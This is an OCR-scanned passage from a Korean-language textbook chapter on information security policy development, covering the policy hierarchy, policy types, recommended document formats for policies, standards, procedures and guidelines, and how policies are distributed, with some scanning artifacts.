을 다루머 필요한 경우에 외부적인 모둘들이 특권모둘들을 부르도륵 허락한다. 

임무/특권의 분할 

임무의 분할은 사람에게 적용된 술어이지만 특권의 분할은 체계에 적용되는 술어이 
다. 특권분할은 둘 또는 그이상의 장치들이 일치해야 공정이나 자료 혹은 체계요소들의 
잠금상태가 해제된다는것을 보여 주기 위하여 쓰인 술어이다. 이런식으로 접근을 얻기 
위해서는 두 체계공정사이의 일치가 있어야 한다. 

책임관계 

책임관계는 특정한 개인이 자기 행동에 대하여 책임 지는 능력이다. 개인에게 책임 
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을 지우기 위하여서는 그 사람을 유일하게，효과적으로 식별인증할수 있어야 한다. 이것 
은 기관에서 매 개인을 유일하게 식별하는 방법을 실현하지 못한다면 매 개인에게 자기 
행동에 대하여 책임지울수 없다는것을 의미한다. 두가지 큰 주제 즉 (1) 사용자가 체계에 
접근할 때 그 개인에 대한 식별 및 인증; (2) 개인이 특정한 거래를 발기하였거나 요구하 
였다는 확인이 있다. 

방책에 대한 경영측의 지원 

새 로운 제 품 또는 봉사의 개 발이 건 방책 의 작성 이 건 그 어떤 발기 에서도 성 과의 결 
정적요인은 경영측의 지원이다. 상급경영측이 행동의 의도를 승인하지 않으면 그 행동은 
성 공할수 없을것 이 다. 이것은 기관의 보안방책작성 에 한한 문제 가 아니며 어떤 행동에도 
다 해 당되 는 문제 이 다. 그러 나 보안방책은 모든 기 관에서 중요한 문제 점들을 제 기할수도 
있으며 처리할수도 있다. 경영자의 지원을 받는것은 종종 계획화공정의 가장 어려운 부 
분이다. 


방책계획화 


계 획화와 준비 는 방책，표준 및 절 차작성 의 전일적 인 부분들이 지 만 종종 무시 당한 
다 . 준비공정 에 는 수행하여 야 할 모든 사업 이 포함된 다 . 방책 은 취 해 야 할 일 반적 인 요 
구들을 제 시한다 . 표준들은 사용될 도구들을 규정한다 . 절 차들은 방책 을 수행 하기 위한 
구체적 인 지 령들을 종업원들에게 보장한다. 

성 문화가 잘된 절 차들이라해 도 감독을 대 신하지 못하지 만 그것 들은 보다 현실적 인 
과업 을 제 기하여 종업 원들이 수행하도록 한다. 종업 원들은 경 영 자들과 토론할수 없는 경 
우에 결심을 채택할 때 방책을 리용하여 정보와 지침을 보장한다. 방책에는 누가 어떤 
행동에 대하여 책임진다는것을 식별해 놓아야 한다. 

효과적 인 방책조항들은 기관에서 두가지 중요한 요구 즉 임무의 분담과 과제의 순환 
식제시를 수행할수 있도록 실제로 도와 줄수 있다. 개별적 인 한 사람이 시 작으로부터 완 
성에 이르기까지의 완전한 공정에 대한 완전한 통제를 할수는 없다. 통제는 협잡행위로 
부터 기관을 보호하는 하나의 요소이 다. 

방책작성 기 간의 계 획 화에 는 보안원칙 에 대 한 주의 를 돌리 는 문제 가 포함되 여 야 한다. 
실례로 세심한 주의를 요하는 업무를 맡은 사람들은 주기적으로 순환하면서 다른 임무를 
맡아야 한다. 이렇게 하면 사람들은 긴장한 조작에서 벗어 나게 되고 작업의 긴장도는 
줄어 들게 된다 . 순환식임 무수행 은 일의 효과성 과 개 선을 비 롯한 일 련의 효과를 달성하 
게 한다. 개선의 측면은 사람들이 일을 번갈아 할수 있게 하며 시야를 넓혀 주고 작업에 
서 실수를 방지하여 작업결과의 질을 높이 게 하는것 이 다. 

방책 이 작성 되 면 그 방책 을 지 원 하는데 쓰일 표준을 규정하는것 이 필 요하다 . 이 표 
준들에는 하드웨어，쏘프트웨어 및 통신규약이 포함되여 있다. 종업원들과 다른 사람들 
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에게 정보를 보내주기 위하여 작성된 통보계획이 없이는 이런 단계들을 거쳐 준비하여도 
아무 소용도 없게 된다. 

경영자들이 모든 종업원들을 일일이 만나 그들의 임무를 알려 줄 시간적여유가 없기 
때문에 통보계획이 특별히 중요할것이다. 그러나 경영자들은 모든 사용자들에게 방책의 
내용을 끊임없이 알려 주며 종업원들에게 방책수행에서 많은 임무를 인식시킬 책임을 지 
니고 있다. 

종업원들에게 정보를 제공하는 능력은 방책，표준 그리고 절차의 작성에서 본질적내 
용의 하나이다. 이런 수단들을 리용하여 종업원들은 방책에 따라 자기 과업들을 어떻게 
수행하여야 하는가를 알게 될것이다. 방책과 련관된 문서들을 누가 작성하는가，그것들 
을 누가 검토하는가 그리고 포함된 정보에 대한 합의는 어떻게 이루어 지는가 하는 문제 
들을 설정하는것은 계획화공정의 한 부분으로 된다. 실례로 경영진의 결정을 그 집행도 
고려하면서 어떻게 작성할것인가 하는 문제를 론의할 때에는 많은 전문가들이 참가하게 
된다. 바로 이 전문가들은 계획작성자들, 경영진 그리고 공동리해관계를 가진 사람들과 
협력하여 방책이 현실성 있고 수행할수 있는것으로 되게 한다. 방책을 효과적으로 작성 
하는 사람들외에 방책이 타당성을 가지도록 하기 위한 보충적인 인원들이 요구된다. 실 
례로 방책을 재검토하는 전문가들가운데는 인적 및 법적문제들을 담당한 사람들도 있게 
된 다. 


방책관리계층 


방책관리계층에는 5개의 단계가 있다. 이 단계들은 그림 20 — 1에서 설명된다. 

제1단계인 법률단계에서는 기관의 규모에 관계없이 기관에 대한 영향력을 행사 
한다. 


변 着 


회 4방책 


하 


태 k 


지진 



그림 20-1. 방책관리계 층 
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그 영 향은 리 익금과 세금으로부터 시 작하여 수출통제 자료에 이르기까지 다 포괄한다. 
법률은 정부에서 제공하며 법률에 따라 취해 진 방책은 법률에 의하여 실시되거나 실시 
되지 않을수도 있다. 

제2단계 에서 는 기 관에서 작성 하고 고위경 영측이 승인하는 방책 을 취 급한다 . 방책 에 
는 기관에 대한 그 중요성이 밝혀 져 있다. 

제3단계에서는 방책에 따라 설정되는 표준을 취급한다. 표준에는 그 준수정형을 립 
증하는데 사용할수 있는 특정한 측정값들이 제시되 여 있다. 

제4단계(절차)에서는 방책 파 표준을 실현하기 위 하여 어 떻게 해 야 한다는 지 령 들을 
차례 로 제 시한다. 

제5단계(지 침)에서는 기관성 원들이 수행해 야 할 작업정형 을 립 증하게 된다. 우의 단 
계들에서는 흔히 권고의 형식을 취 하며 표준단계 에서는 지시의 형식을 따르지만 지침단 
계 에 서 는 선택 방법 으로 한다. 

표준과 절차사이에 삽입되는 하나의 보충단계가 있을수 있다. 이 단계에서는 하나의 
흐름과정에 비길수 있는 관례를 취급한다. 표준단계에서는 수행되여야 할것을 제시하고 
관례단계 에서 는 리유와 방법 을 규정한다. 그러 나 절 차단계 에서 는 실현에 대 한 특정한 하 
나하나의 지령들을 제공한다. 작성형식과 방법을 비롯하여 우의 문서들에 대해서는 이 
장의 뒤부분에서 언급한다. 


방책의 류형 


방책의 류형에는 3가지 즉 규제, 권고 및 통보가 있다. 기관에서는 기관전체에 적용 
할수 있 는 해 당 방책 을 작성할수 있지 만 산하부서 들에 서 는 부서내 방책 을 자체 로 작성보 
급할수 있다는것을 알아 두는것 이 또한 중요하다. 

규제 방책 

규제방책 은 기 관에서 허술하게 대 하여도 되는것 이 아니 라 반드시 의거해 야 하는 방 
책 이 다. 의 학과 법률과 갈은 일부 전문분야들을 규제하는 정부와 규제 및 통제 기 관들은 
전형적으로 이런 형식의 방책을 세운다. 일반적으로 공동재부의 안전이나 관리와 같은 
공동의 리익을 위하여 운영되거 나 자기들의 행동에 대 하여 집 단앞에 책 임질수 있는 기 관 
i 들_은 규제방책 의 사용자들이 다. 

이 런 류형 의 방책 은 무엇 을 수행하여 야 하는가，언제 수행하여 야 하는가，누가 수행 
하는가를 구체 적 으로 밝히 며 그것 을 수행하는것 이 왜 중요한가에 대 한 명 확한 분석 을 줄 
수 있는 일 련의 법 적 조항들로 이 루어 진다. 많은 그룹들이 이 런 방책 들을 리용하기때 문 
에 그들은 자기 기 관을 위하여 이 런 방책 들을 함께 리용하며 해 석한다 . 비 밀 성，무결 성 
및 리 용성 (CIA) 외 에 규제 방책 을 세 우는데 는 2가지 전제 조건 이 있 다. 

첫째 전제조건은 명 백하게 일관한 공정 을 세우는것 이 다. 이것은 일반대중이 일하는 
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기관들에서 특히 절실한것이다. 그러므로 이런 기관들에서는 편견 없이 규정을 적용하는 
일관성을 세워야 한다. 둘째 전제조건은 해당 부문을 책임진 기술지식이 없는 사람들이 
그 부문의 과업을 수행할수 있는 기술적능력이 있어야 한다는것을 절감하게 하는 계기를 
방책 에 반영 하는것 이 다 . 

규제방책은 흔히 그 적용에서 례외조건들 혹은 제한조건들을 가진다. 규제방책은 사 
탐들이 직면한 사실에 기초하여 결정들을 즉시 만들어야 하는 경우에는 실효성이 없는것 
이다. 이것은 많은 정황들이 많은 각이한 결과들을 가져 오는 사정과 관련된다. 모든 가 
능한 결과들을 처리할수 있는 방책의 수립은 결국 매우 복잡하며 적용하기 힘들고 또한 
실 시 하기 매우 어 려 운 방책 을 제 기 하는것 으로 된 다. 

권고방책 

권고방책에는 일정한 정황에서 취해 질 행동에 대하여 매우 강한 표현으로 작성한 
건의안들 혹은 사용방법이 반영된다. 이것은 방책의 정의에 모순되는것 갈지만 현실적으 
로 권고형식의 방책은 이런 건의안들을 제기한다. 권고방책은 지식 있는 사람들에게 정 
보를 제공하여 정황 및 행동방식과 관련한 결심을 채택하게 한다. 

이 방책은 권고방책이기때문에 그 실행이 어렵지 않다. 그러나 방책의 한계안에서 
제공되는 조언을 따르지 않는데서 생기는 후과도 방책에 반영된다. 방책은 해당 후과들 
을 밝히며 또한 행동방향을 바꾼다면 후과가 어떻게 된다는것을 밝힐 능력을 정보를 접 
수한 사람들에게 제공하여 준다. 

방책을 따르지 않는데서 오는 후과들에는 다음과 갈은것들이 있을수 있다. 

• 충분한 결심 채택에 필 요한 정 보를 놓치는것， 

• 결정채택과 공정완성의 적임자들에게 통지를 하지 못하는것， 

• 중요한 최 종한계 시 간을 놓치 는것， 

• 검열자들 및 경영진과 함께 대 안들을 검 토평 가하는데 시 간을 랑비 하는것 . 

권고방책을 따르지 않는데서 오는 위험이 기관들에 큰 문제로 될수 있다고 보는것이 
중요하다. 대안의 평가와 토론으로 하여 잃어 버린 생산시간의 비용만이 기관에 그리고 
과정의 타당성과 정확성을 평가하는데 큰 타격을 줄수 있다. 

권고방책들에는 흔히 일정한 제한조건과 례외조건들이 있다. 실례로 권고방책에는 
행동방향결정에 오직 경험 있는 사람들만이 참가할수 있으며 경험이 적은 사람들은 개인 
적인 결심채택을 허용받지 못하고 규정된 방책을 따라야 한다는것이 제시될수 있다. 방 
책의 례외조건들과 그런 정황에서 수행되여 야 할것을 문서화하는것 이 또한 중요하다. 

틍보방책 

제3형태의 방책은 본질상 통보성을 띠는 방책이며 그 목적은 해당 대상들에게 정보 
를 보내는것 이 다. 통보대상은 일반적 으로 그 방책을 읽 을 기회 또는 리유를 가지는 임의 
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의 개별적인 사람이다. 이 방책에는 독자의 행동이나 책임사항이 제시되여 있지 않으며 
또 이 방책을 따르지 않아도 법적제재는 받지 않는다. 

통보방책 이 규제 방책 이 나 권고방책들보다 덜 중요한 정보를 제공할수 있지만 특정 한 
정황들에서는 강한 사상을 통보대상들에게 줄수 있다. 통보방책의 대상들이 많은것으로 
하여 더 구체적인 다른 방책들을 참고로 하여 더 구체적인 정보를 볼것을 권고할수 있다. 
이렇게 되면 보다 기밀적인 내용을 담은 방책들은 그 배포를 제한하고 통보방책들을 배 
포함으로써 위험성을 줄이게 된다. 

회사방책과 부서방책 

회사방책과 부서방책의 유일한 차이는 그 범위에 있다. 실례로 기관들에서는 고객들 
호상간의 관계를 취급하는 방책을 규정할수 있다. 특정한 기관들에서는 일정한 부서에만 
있는 고객들호상간의 관계를 취급하는 방책을 밝힐수 있다. 온 기관에 적용되는 방책으 
로서는 회사 혹은 기관 방책외에 또 다른 방책이 없으며 부서방책은 그 부서에만 한한 
방책이다. 범위가 좁기때문에 방책을 재검토하고 그에 대한 의견을 발표해야 할 사람이 
줄어 드는 관계로 방책을 재고찰하고 승인하는 과정은 그만큼 짧아 질수 있다. 

일정방책과 주제방책 

이 중요한 방책형태들은 별개의 문제로 하고 일정방책과 주제방책사이의 차이를 밝 
혀 주는것이 중요하다. 일정방책은 기관의 전반적보안에 대한 관점을 세우는데 쓰이지만 
주제별방책들은 관심사로 되는 특정한 주제들을 제시하는데 쓰인다. 또한 주제방책은 특 
정한 응용 혹은 체계를 보호하는데 쓰이는 응용별 방책이다. 

방책 작성 


방책의 각이한 형태들，경영진의 지원과 새 방책보급의 중요성 그리고 기관에서 방책 
의 필요성을 고찰한 후에 는 기관을 위 한 방책 작성 과정 에로 넘어 가게 된 다. 

방책의 주제 

모든 기관에서는 기본적인 방책들을 다 세워야 한다. 이 방책들은 흔히 기관들에서 
문서로 준비할수 있으며 정보보안전문가들은 여기에 필요한 내용들을 보충할수 있다. 

어느 한 문제에 대한 상급경영진의 결심에 의하여 방책의 매 조항이 작성된다. 그러 
므로 방책에 리용될수 있는 주제들의 범위는 넓은것이다. 

이 방책에 반영할 주제들은 다음과 같다. 
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1. 일치 한 사상 

2. 행동규범 

3. 리해의 충돌 

4. 통보 

5. 전자통신체계 

6. 인 터네 트보안 

7. 전자통신방책 

8. 일반보안방책 

9. 정보보호방책 

10. 정보분류 

이것은 모든 항목들을 다 포괄하는 목록이 아니지만 문제로 설정되는 분야들을 식별 
하는데 목적이 있다. 방책의 개발에 착수하기전에 모든 방책주제분야들을 다 식별할 필 
요는 없다. 하나의 방책 을 작성하면서 다른 기 관의 방책 혹은 다른 련관된 문서를 참고 
할수도 있는것이다. 

어느 방책에서나 리용해야 할 일정한 형식이 있다. 그러나 기관에서 이미 작성한 방 
책이 있다면 새로 작성하는 방책을 이미 작성한 방책의 형식에 맞추어 세워야 한다. 이 
렇게 하는것은 방책을 읽을때 그것을 방책으로 리해하도록 하기 위하여 중요한것이다. 
방책 을 작성하면서 종래의것과 다른 형식 을 취 하면 그것 이 방책임 에도 불구하고 독자는 
그것을 방책 이라고 생각하지 못할수도 있다. 

보안원칙들이 방책개발에 주는 영향. 기관에서는 방책개발에 의의가 있는 일정한 정도 
의 보안원칙 들을 선택해 야 한다 . 방책 과 련관문서 들을 개 발할 때 선택한 원칙 들을 고려 
해 야 하며 선택한 원칙 들에 대 한 방책(즉 표준，절 차 및 지 침)의 호상관계 를 재 검 토해 야 
한다. 이것은 표 20—2에서 보여 주는 모형 을 실행하는 과정 을 통하여 쉽게 수행할수 있 
다. 


표 20-2 원칙의 재검토와 방책의 전개 


방책 1용 

원칙 1 

원칙 2 

전체 방책내용 

이 원칙이 적용되면 이 란에 

◦를 넣으라. 

이 원칙이 적용되면 

이 란에 ◦를 넣으라. 


이 모형 에서 요구되 는 원칙 들은 모형 의 웃부분에 가로 기 록하며 방책내 용들을 왼쪽 
란에 내리 기록한다. 《 o 》 는 해당한 란들에 표시하여 원칙과 방책내용사이의 관계를 
설명한다. 방책(혹은 방책구성요소)에 원칙들을 련관시킴으로써 방책작성자는 그 성과를 
평가할수 있다. 이렇게 되는것은 원칙들이 기관의 목적 즉 업무의 부분으로 되여야 하기 
때문이다. 

어떤 원칙도 반영하지 않는 방책이나 구성요소가 있다면 그 방책 또는 구성요소를 
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재검토하여 그것이 실제로 필요한가 혹은 요구되지 않는 원칙이 있는가 하는것을 
밝혀야 한다. 이런 비교를 진행하여 방책작성자는 방책을 전개하는 도중에 수정을 
가하거나 혹은 주요원칙들과 관련하여 상급경영진에 건의할수 있다. 

방책작성기법 

방책을 작성할 때 작성자가 방책전달대상을 고려하는것은 필수적이다. 이렇게 
하는것이 중요한것은 방책전달대상이 리해하지 못하게 작성한 방책은 청중에게 혼 
란과 오해를 일으킨다는 사정과 관련된다. 

언어. 방책전달대상에게 알맞는 언어를 사용하는것은 중요한 문제이다. 은어를 
쓰지 말아야 하며 될수록 리해하기 쉬운 말을 해야 한다. 방책을 리해할수 있어야 
사용자들은 자기들의 임무와 방책을 실현하기 위하여 해 야 할것을 정하게 된다. 흔 
히 쓰지 않는 언어로 방책을 작성하면 방책이 잘못 해석될수 있다. 

초점. 방책에서 취급되고 있는 화제에서 벗어 나면 안된다. 보충적 인 화제와 문 
제들을 방책에 끌어 들이면 방책을 리해하기 어렵게 되고 혼란을 주게 될것이다. 
쉬운 어림짐작방법에 의하면 매개 중요한 화제마다에 하나의 방책이 담겨 져야 한 
다는것 이 다. 하나의 방책 이 너 무 크면(즉 4폐 지 이 상이 면) 화제내 용은 부분화제 들로 
갈라 지므로 방책의 초점을 놓치지 않으면서 경영진이 의도하는 내용들을 취급해야 
한다. 

령식 

방책 은 효과적 인 정 보보안구조를 구축하기 위한 초석 으로 된 다 . 방책문은 방책 
이 무엇 인가를 규정하며 방책 의 가장 효과적 인 부분으로 간주된 다 . 정 보보안방책 의 
목표는 정 보자원의 무결성，비 밀성 및 리용성 을 유지 하는것 이 다. 기 관들이 이 목표 
를 달성하지 못하게 하는 기본위험들에는 고의적이건 우연적이건 도난，수정，파괴 
혹은 루설이 속한다. 

용어《 방책》은 사람마다 각이하게 해석한다. 방책은 어떤 문제 에 대한 경 영진 
의 결심 이 다. 방책 은 흔히 기 업소의 확신，목표와 목적 그리 고 특정한 문제의 분야 
에 서 그것 을 달성 하기 위한 일 반적수단을 기 술한 사항들을 포함한다. 

방책문자체 는 높長 준위 에 서 간명하게 규정된다 . 방책 이 높은 준위 에 서 작성되 
기때 문에 그 방책 을 수행하는 방법 을 기 록하여 야 한다 . 방책 의 효과성 보장에 의 무 
적인 행동，규칙，준칙 혹은 규정은 표준대로 되여야 한다. 

방책 에 포함되 지 않은 별 지문서 인 지 침 들은 절 차작성 의 기 초틀거 리 를 제 공하는 
보다 일반적인 사항들이다. 표준들은 의무사항이지만 지침들은 권고안으로 된다. 실 
례 로 다중인증을 어 떤 정 황에 서 해 야 하는가를 밝히 는 방책 은 기 관에 서 작성할수 
있 다 . 표준에 의하면 접 수될수 있는 다중인증도구에는 접 수되 고 승인된 방법 들에 
대 하여 특정한 사항들이 명 문화되 여 있 어 야 한다. 

방책들이 다음과 같이 되여야 한다는것을 기억하라. 
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1. 리해하기 쉬워야 한다. 

2. 적용할수 있어야 한다. 

3. 수행할수 있 어 야 한다. 

4. 강제력 이 있어야 한다. 

5. 단계 적 으로 수행할수 있 어 야 한다. 

6. 예방적인것으로 되여야 한다. 

7. 절대적인것으로 되지 말아야 한다. 

8. 기 업목적 을 실 현 하여 야 한다. 

방책 을 작성하는것 은 쉬 울수도 있 고 어 려울수도 있 다 . 그러 나 방책작성 자는 일 
반적 인 방책형식 에 구애되지 말고 많은 기자들과 작가들이 의거하는 특성들을 기 억 
해 야 한다. 

• 무엇. 방책의 취지는 무엇인가. 

• 누구. 누가 영향을 받는가，종업원과 경영진의 책임과 의무는 무엇인가. 

• 어디에. 어디에 방책이 적용되는가，방책의 규모는 얼마나 되는가. 

• 어떻게. 준수요인은 무엇 인가 그리고 준수정도는 어떻게 측정하는가. 

• 언제. 방책은 언제 효력을 발생하는가. 

• 왜. 이 방책을 실현하는것이 왜 필요한가. 

방책 의 특성 들을 고찰하는데서 남의 평 가를 찾아 보기전 에 방책작성 자가 방책 에 
대 한 자체 평 가를 하는것 이 더 쉽다. 자체평가를 하여 상급경 영 진에 방책 에 대 하여 
통보하거 나 제 출하는것 이 더 욱 성 과적일것 이 다. 자체 평 가는 여 러 가지 방법 으로 진행 
할수 있다. 그러 나 효과적 인 방법 은 방책 을 믿 음직한 보안원칙 과 비 교하는것 이 다. 

중요한것 은 방책작성 자가 기 관에 방책 들이 작성되 여 있는가 하는것 을 확인하는 
것이다. 방책들이 작성되여 있다면 그것들을 하나로 련결시킬 새로운 방책을 작성 
해 야 한다 . 이 미 있는 형 식 으로 새 로운 방책 을 작성하면 기 관성 원들은 새 로 작성된 
방책을 쉽게 리해할것이다. 그러나 이렇게 이미 있는 형식으로 방책을 작성하지 않 
으면 사람들은 작성한 새 방책 을 방책 으로 보지 못하게 된다. 

건의되는 방책형식은 아래의 체계로 되여야 한다. 

• 배경 왜 방책이 존재하는가. 

• 범위 방책은 누구에게 영향을 주는가 그리고 방책은 어디에 필요한가. 

• 정의 용어들에 대한 해석 

• 참고 사람들은 어디서 보충정보를 찾을수 있는가. 

• 조정자/방책작성자 누가 방책을 주관하였는가 그리고 의문이 있으면 어디에 
가서 질문해 야 하는가. 

• 위임관 누가 방책 을 위 임하였 는가. 

• 효력날자 언제 방책 이 효력을 내는가. 
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• 재검토날자 언제 방책이 재검토되는가. 

• 방책사항들 무엇을 해야 하는가. 

• 례외조항들 례외조항들은 어떻게 처리하는가. 

• 제재 위반행위를 알아 냈을 때 경영진은 어떤 대책을 적용할수 있는가. 

기관들에서는 실정에 맞는 형식으로 방책들을 설계작성한다. 이런 경우에 방책 
문서에는 주요제목들과 화제들이 설정된다. 이 부분의 내용들은 이 장의 뒤부분에 
서 《 공통형 식의 설정》이 라는 제 목을 달고 제 시 한다 . 


표준의 규정 


표준은 과업을 수행하고 그 성과를 평가하기 위한 규칙들이 어떤것들인가를 규 
정한다는것을 상기하라. 실례로 전기접속구의 모양이 어떻게 되여야 하며 국가적으 
로 어떻게 제작되여야 한다는것을 규정하는 표준이 있다. 제작자들이 표준을 지키 
면 그 접속구들을 팔수 있게 될것이다. 구매자들이 접속구들을 사면 그들의 설비는 
그 접속구에 맞을것이다. 

표준은 정기적으로 확인받아 그것을 준수하도록 해야 하기때문에 표준에 대한 
설명은 간단하지 않은것이다. 전기접속구의 실례를 생각하자. 제작흐름선이 변화되 
여 완성된 제품에 영향을 주게 된다면 그 공정이 표준에 따라 평가될 때까지 구매 
자*은 그 접속구를 사용할수 없게 되여 결국 더는 팔수 없게 되고 비용이 많이 들 
게 되며 경영에서 혼란을 가져 오게 된다. 

따라서 새로운 표준규격을 내오면 그 실현과 유지에 많은 비용이 드는것으로 하 
여 특별한 경우를 제외하고는 실제상 표준규격을 새로 만드는 기관이 좀처럼 없는 
것이다. 

건의된 표준문서형식에는 아래와 같은 체계들이 포함된다. 

• 배경 왜 표준이 존재하는가. 

• 범위 누가 표준을 요구하며 그것이 어디에 필요한가. 

• 정의 용어해석 

• 참고 사람들은 어디에서 보충정보를 찾아 볼수 있는가. 

• 조정자/표준제작자 누가 표준을 주관하였는가 그리고 질문이 있으면 어디에 
가서 질문해 야 하는가. 

• 위임관 누가 표준을 위 임 하였는가. 

• 효력날자 언제 표준이 효력을 내는가. 

• 재검토날자 언제 표준이 재검토되는가. 

• 표준사항들 측정값과 요구사항들은 어떤것인가. 
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기관들에서 그에 알맞는 방식으로 표준들을 설계작성할수 있는데 이 형식은 방 
책의 문서 안에서 주요제목들과 화제내용들을 설정한다. 

표준을 완성하는것이 중요하지만 높은 실현유지비로 하여 흔히 그 수명 즉 재검 
토날자는 적어도 앞으로 5년은 되여야 한다는것을 강조하는것이 중요하다. 

절차의 규정 


절차는 기관마다 다르다. 절차작성에 대한 일치한 견해는 없다. 이전에 개발된 
표준이나 대상청중에게 무엇이 가장 잘 작용하겠는가에 대한 시험에 기초하여 기관 
의 절차가 어떻게 되여야 한다는것을 결정하게 된다. 절차의 작성은 거기에 포함되 
는 세 부지 표들로 하여 가장 어 려 운 문제 라고 말할수 있다. 

절차의 작성은 거기에 포함되는 매우 높은 수준의 세부지표들로 하여 해당한 문 
서작성 에 서보다 보통 더 많은 인원을 요구하게 된다. 그러 므로 절 차개 발을 담당한 
책 임 자는 절 차작성 에 포함되 는 단계 들을 문서 화하기 위하여 현재 그 일을 수행 하고 
있는 사람들과 같은 전문가집 단을 구성하여 야 한다. 이 문서 화에는 주어 지 게 될 실 
제적인 지령사항들, 이 지령사항들에 대한 론거들과 예견되는 결과들이 포함되여야 
한다. 

또한 절 차를 작성할 때 쓰일 수 있 는 몇 가지 형 식 들이 있다. 다른 문서 들은 사람 
들을 특정한 방식 으로 행 동하게 하려 는 경 영 진의 희 망을 전 달하기 위하여 작성 되 지 
만 절차에는 실제적으로 작업을 시키는 방법이 기술된다. 작성자는 이야기형식，흐 
틈도형 식 과 연극대 본형 식중에 서 어 느 하나를 선택할수 있다. 

이 야기형 식은 문답형 식 으로 정보를 제공한다. 정 보제 공은 이 야기식 으로 무난히 
진행 되지 만 사용자에게 리해 하기 쉽 게 단계 적으로 진행 되지 는 못한다. 흐름도형 식 에 
서 는 그림형 식 으로 정 보를 제 공한다. 이 형 식 에서 작성 자는 론리적 단계 로 정 보를 제 
공할수 있게 된다. 아마도 다른 방법들보다 더 많이 사용되는 연극대본형식에서는 
사용자가 리해할수 있도록 지 령사항들을 하나하나 제 시한다. 

대상청중이 알아 들을수 있는 수준의 언어로 절차를 서술하여야 한다는것을 잊 
지 말아야 한다. 이 장에서 토론되는 중요한 절차요소들은 절차의 필요성을 식별하 
는것，대상청 중을 결정하는것，절 차의 범위를 수립하는것과 절 차의 취지 를 기술하는 
것 이 다. 

건의된 절차문서형식은 아래의 체계로 구성된다. 

• 배경 왜 절 차가 존재하며 절 차와 관계 되 는 방책 및 표준문서 들은 어 떤것 들 
인가. 

• 범위 누가 절차를 요구하며 어디에 그것이 요구되는가. 

• 정의 용어해석 

• 참고 사람들이 보충정보를 어디에서 찾을수 있는가. 
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• 조정자/절차작성자 누가 절차를 주관하였는가 그리고 의문사항이 있으면 어 
디에 가서 질문을 해 야 하는가. 

• 효력날자 언제 절차가 효력을 내는가. 

• 재검토날자 언제 표준이 재검토되는가. 

• 절차사항 측정값과 요구들은 어떤것 인가. 

기관들에서는 실정에 맞는 형식으로 절차들을 설계작성할수 있지만 이 절차형식 
에는 주요체계들과 화제들만 제시하고 있다. 

지침의 규정 


지침들은 바로 그 특성으로 하여 작성집행하기가 보다 쉽다. 지침은 경영진이 
바라는 종업원들의 행동에 관한 법적구속력이 없는 건의안들이다. 종업원들이 자기 
책임을 어떻게 수행하여야 한다는것을 기술하는 다른 문서들과는 달리 여기서는 종 
업원들이 마음에 드는 지침들을 택할수 있는 자유를 가진다. 어느 지침이건 그 준수 
는 전적으로 선택에 달려 있다. 

방책작성자들은 지침들을 방책의 전 과정의 일환으로 작성한다. 그것은 문서들 
에는 강제력이 동원될수 없는 장려하여야 할 도의적문계들이 포함되여 있기때문이 
다. 이런 도의적문제들이 지침들의 기초를 이룬다. 

다른 문서들과 마찬가지 로 건의된 지침문서형식은 아래의 체계로 이루어 진다. 

• 배경 왜 지침이 존재하며 그것과 관련된 방책 및 표준문서들은 어떤것들인 
가. 

• 범우 I 누가 지침들을 요구하며 어디에 그것들이 필요한가. 

• 정의 용어의 해석 

• 참고 사람들이 어디에서 보충정보를 찾아 볼수 있는가. 

• 조정자/지침작성자 누가 지침을 주관하였는가 그리고 의문사항이 있으면 어 
디에 가서 질문하여 야 하는가. 

• 효력날자 언제 표준지침들이 효력을 내는가. 

• 재검토날자 언제 표준지침을 재검토하는가. 

• 지침사항 지침내용과 요구사항들은 어떤것들인가. 

다른 문서들과는 달리 지침승인자가 필요 없다. 지침은 대체로 큰 포괄범위로 
작성되며 법적구속력을 가지지 않기때문에 승인서명 이 요구되지 않는다. 
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방책의 발표 


문서가 완성되면 기관의 종업원들 즉 성원들에게 보급되여야 한다. 이것은 종업 
원방책지도서，부서소책자 그리고 직결전자출판으로 실현된다. 어떤 방책의 성과도 
종업원들이 그 방책에 대하여 얼마나 알고 있는가에 좌우된다. 이것은 종업원들이 
방책을 알아야 한다는것을 의미한다. 이를 위하여 기관에서는 종업원들에게 방책을 
보급하며 종업원들이 앞으로 있게 될 방책의 변화를 알고 있도륵 하는 방법을 가져 
야 한다. 

방책지 도서 

각 기관들에서는 방책지도서를 잘 만들어 매 개인들에게 한부씩 보장하군 한다. 
방책들을 참고하고저 하는 사람들에게 즉시적으로 보장할수 있는것으로 하여 이 사 
업은 일정한 기간 효과성이 높다고 한다. 그러나 지도서의 갱신과 같은 문제들이 제 
기되면 종업원들은 지도서들이 갱신될것을 기대하였다. 그러나 다른 긴급한 문제들 
로 하여 지도서들을 추세에 따라세울수 없었다. 그러므로 방책에 대한 검토문제가 
제기되면 혼란에 빠지게 되군 하였다. 

설상가상으로 기관들에서는 기관의 모든 성원들에게 문서를 공급하는데 드는 많 
은 비용은 그들의 리윤곡선에 부정적결과를 가져 온다는것을 리해하기 시작하였다. 
기관들에서는 지도서비용으로 하여 종업원들이 창조하는 가치가 점점 줄어 든다는 
것을 깨닫기 시작하였다. 따라서 기관들에서는 전자출판을 방책보급에 리용하기 시 
작하였다. 

부서 소책자 

모든 방책이 다 기관전체성원들을 위한것은 아니다. 기관산하의 개별적부서들은 
또한 자기부서에 필요한 방책을 작성해야 하였다. 부서용 방책지도서작성이 가능하 
기는 하였지만 비용의 견지에서는 실용성이 없었다. 그러므로 부서들에서는 자기 분 
야에만 관계되는 방책들을 주는 소책자들을 만들었다. 

방책의 직결배포 

개인용콤퓨터의 증가와 정보에 대한 직결접근가능성이 커짐에 따라 더 많은 기 
관들에서 방책을 망에서 보급하게 되였다. 이런 사정으로 종업원들에게 새 방책과 
새 자료들을 보급하는데서 높은 속도가 가능하게 되 였다. 

Web 이 통신매체로 출현하게 되면서 기관들에서는 그것을 방책을 보급하는 수단 
으로 리용하고 있 다. 하이 퍼 링 크를 리용하여 기 관들에 서 는 련관된 다른 문서 들 및 
참고자료와 련 계 를 맺 어 줄수 있다. 
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의식화 


그러나 종업원들에게 정보와 방책을 보급하는데 리용되는 매체에는 관계없이 종 
업원들은 자기들에게 필요한 방책들을 제때에 접수하는것이 중요하다는데 대하여 
알아야 한다. 그리고 지어 매체도 심중하게 선택하여야 한다. 전체 종업원들이 콤퓨 
터를 다 가지고 있지 못하는 경우에는 또한 방책을 인쇄하여 보급하여야 한다. 끊임 
없는 의식화사업을 진행하여야 회사방책과 그것이 종업원들에게 주는 영향에 대한 
종업 원들의 인식수준이 유지될것 이 다. 


공틍형식의 설정 


공통형식은 독자들이 방책과 방책보조문서들의 목적을 쉽게 리해하도록 한다. 
